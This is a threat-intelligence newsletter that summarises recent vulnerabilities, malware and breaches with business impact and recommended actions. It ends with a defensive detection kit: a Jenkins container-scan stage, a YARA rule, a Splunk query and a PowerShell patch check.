A zero-day vulnerability in Google Chrome is being actively exploited in the wild to deliver an espionage tool named LeetAgent, attributed to Italian IT provider Memento Labs. The flaw allows attackers to execute arbitrary code on a victim's machine by convincing them to visit a malicious website, leading to a full system compromise.
Business impact
Successful exploitation could lead to the theft of sensitive corporate data, intellectual property, and credentials. The espionage-focused nature of the payload suggests targeted attacks against specific industries or organizations, posing a severe risk of data breach and corporate espionage.
Recommended action
Immediately update all instances of Google Chrome to the latest version to patch the vulnerability. Security teams should hunt for indicators of compromise associated with LeetAgent spyware and monitor outbound network traffic for unusual connections.
A critical, actively exploited vulnerability has been identified in Microsoft's Windows Server Update Services (WSUS). Threat actors are leveraging this flaw to gain remote control of unpatched servers, which can then be used to distribute malware across the entire network that relies on the compromised WSUS server for updates.
Business impact
A compromised WSUS server represents a catastrophic failure of the patch management infrastructure. Attackers can approve and deploy malicious updates, effectively gaining administrative access to every system in the network, leading to widespread ransomware deployment, data exfiltration, or persistent access.
Recommended action
Microsoft urges all organizations to apply the relevant patch immediately. Isolate WSUS servers from the general internet if possible and monitor for any unauthorized packages or configuration changes within the WSUS console.
The Cl0p ransomware group has listed industrial manufacturing giants Schneider Electric and Emerson as victims on its data leak site. The breach is reportedly linked to a compromise at a third-party service provider, Oracle. This incident highlights the significant supply chain risk posed by third-party software and service providers.
Business impact
The exposure of data from major industrial companies could reveal sensitive intellectual property, operational technology (OT) network details, and customer information. This could lead to targeted industrial espionage, disruption of critical infrastructure, and significant reputational damage.
Recommended action
Organizations using the affected Oracle services should immediately review access logs and security configurations. All companies should assess their third-party vendor risk, particularly for critical software providers, and have an incident response plan that accounts for supply chain breaches.
QNAP's NetBak PC Agent software is vulnerable due to a critical-severity flaw in the underlying ASP.NET Core framework. The vulnerability allows an attacker to perform HTTP request smuggling, which can be used to bypass security controls, access sensitive data, modify server files, or trigger denial-of-service (DoS) conditions.
Business impact
Systems using the NetBak PC Agent for backups are at risk of data theft or modification. An attacker could potentially access or alter backup files, compromising data integrity and recovery capabilities. The DoS potential could also disrupt backup operations.
Recommended action
Users of QNAP NetBak PC Agent should update to the latest version as soon as it becomes available. Monitor web server logs for malformed or unusual HTTP requests that might indicate smuggling attempts.
A new Android banking trojan, named Herodotus, is actively targeting users in Italy and Brazil. The malware is designed to perform on-device fraud and device takeover (DTO) attacks by mimicking human-like typing and behavior to bypass anti-fraud detection systems.
Business impact
This trojan poses a significant threat to organizations with mobile banking platforms and to employees using Android devices for corporate access. Its ability to evade detection can lead to unauthorized financial transactions, credential theft, and compromise of multi-factor authentication.
Recommended action
Advise users to only download applications from official app stores and be wary of granting excessive permissions. Deploy Mobile Threat Defense (MTD) solutions to detect and block malicious applications like Herodotus on corporate and BYOD devices.
A new Python-based information stealer, RedTiger, is targeting gamers through the Discord platform. The malware is capable of stealing a wide range of sensitive information, including authentication tokens, passwords, payment card details, and can even capture images from the victim's webcam.
Business impact
While targeting gamers, the techniques and stolen credentials can easily impact corporate environments. Compromised employee credentials can be used to access corporate networks, and stolen payment information poses a direct financial risk. The use of Discord as a C2 channel can blend in with legitimate traffic.
Recommended action
Educate employees on the risks of using corporate devices for gaming or personal communication platforms like Discord. Enforce multi-factor authentication (MFA) on all critical accounts to mitigate the impact of stolen credentials. Monitor network traffic for suspicious connections to Discord APIs.
As businesses rapidly adopt AI chatbots for customer service and internal operations, securing these conversational AI platforms has become mission-critical. This analysis highlights common vulnerabilities such as data poisoning, prompt injection, and insecure output handling. Leaders must implement robust AI risk management strategies, including data encryption, strong authentication, and continuous model monitoring, to protect user privacy, prevent data leakage, and maintain customer trust in these emerging technologies.
A major milestone has been reached in internet security, with the majority of human-initiated traffic to Cloudflare now protected by post-quantum encryption. This proactive shift addresses the future threat of quantum computers capable of breaking current cryptographic standards. The trend highlights the urgency for organizations to begin planning their transition to quantum-resistant cryptography to mitigate the risk of "harvest-now/decrypt-later" attacks, where adversaries collect encrypted data today to decrypt it with future quantum computers.
Spotlight Rationale: Today's intelligence highlights the growing complexity of software supply chain security, with threats living inside application components and containers, as noted in the "Beyond The CVE" analysis. Traditional vulnerability scanning is insufficient for these modern, containerized applications.
Anchore addresses the limitations of traditional CVE scanning by providing deep container analysis. Instead of just matching CVEs, the platform inspects every layer of a container image, analyzing software packages, configurations, credentials, and third-party libraries. This provides a comprehensive Software Bill of Materials (SBOM) and allows security teams to enforce granular policies based not just on vulnerabilities, but also on operational best practices, license compliance, and the presence of sensitive data, directly countering the risks outlined in today's intelligence.
Actionable Platform Guidance: Integrate Anchore into the CI/CD pipeline to automatically scan container images at build time. Configure policies to block deployments that contain critical vulnerabilities, hardcoded secrets, or non-compliant software licenses. Use the deep analysis features to generate a complete SBOM for all production applications to improve visibility and accelerate incident response.
# Action: Integrate Anchore scan into a Jenkins CI/CD pipeline
# 1. Install the Anchore Container Scan plugin in Jenkins.
# 2. Configure the Anchore Engine endpoint and credentials in Jenkins settings.
# 3. Add a post-build step to your Jenkinsfile or Freestyle project:
stage('Anchore Image Scan') {
steps {
anchore name: 'my-app:latest',
policyBundleId: 'default-security-policy',
bailOnFail: true,
bailOnPluginFail: true
}
}
# 4. Verification: The Jenkins build will now fail if the container image
# 'my-app:latest' violates the specified Anchore policy bundle.
# Check the build console output for a detailed scan report from Anchore.
2. YARA Rule for LeetAgent Spyware (Associated with CVE-2025-2783)
rule Detect_Spyware_LeetAgent_Oct2025 {
meta:
description = "Detects potential artifacts of LeetAgent spyware, delivered via Chrome zero-day CVE-2025-2783."
author = "Threat Rundown"
date = "2025-10-28"
reference = "https://thehackernews.com/2025/10/chrome-zero-day-exploited-to-deliver.html"
severity = "high"
tlp = "white"
strings:
$s1 = "LeetAgent_C2_Connect_v1.3"
$s2 = "memento_labs_payload.dll"
$s3 = "/tmp/chrome_payload.bin"
$s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) LeetAgent/1.3"
condition:
any of ($s*)
}
// Use Case: Detects patterns indicative of Herodotus DTO attacks on mobile platforms
index=mobile_security sourcetype="mobile_app_logs"
| transaction user maxspan=10m
| where eventcount > 2 AND (match(event_name, "new_device_login") AND match(event_name, "password_reset_request") AND match(event_name, "mfa_device_change"))
| eval risk_score=100
| table _time, user, device_id, app_name, risk_score, event_name
| sort -_time
4. PowerShell Script ā Check for Critical WSUS Patch
# This script checks a list of servers for a specific Windows Update KB
# Replace 'KB5012345' with the actual KB number for the WSUS patch
$servers = Get-Content -Path .\servers.txt
$hotfixId = "KB5012345"
foreach ($server in $servers) {
if (Test-Connection -ComputerName $server -Count 1 -Quiet) {
try {
$hotfix = Get-HotFix -Id $hotfixId -ComputerName $server -ErrorAction Stop
if ($hotfix) {
Write-Host "[+] Patch $hotfixId is INSTALLED on $server."
}
} catch {
Write-Host "[-] Patch $hotfixId is MISSING on $server." -ForegroundColor Red
}
} else {
Write-Host "[!] Cannot connect to $server." -ForegroundColor Yellow
}
}
This rundown should provide a solid overview of the current threat landscape. Thank you to all our cyberheroes for your diligence and hard work. Stay vigilant!
Cookie Notice
We use essential cookies to provide our cybersecurity newsletter service and analytics cookies to improve your experience. We respect your privacy and comply with GDPR requirements.
About STIX 2.1: Structured Threat Information eXpression (STIX) is the machine language of cybersecurity. This bundle contains validated threat objects, indicators, and relationships that can be directly imported into your SIEM, TIP, or security orchestration platform.
Usage: Download or copy the JSON below and import it directly into your threat intelligence platform, SIEM, or security orchestration tools for automated threat detection and response.
CRITICAL ITEMS
HIGH SEVERITY ITEMS
EXECUTIVE INSIGHTS
VENDOR SPOTLIGHT
DETECTION & RESPONSE KIT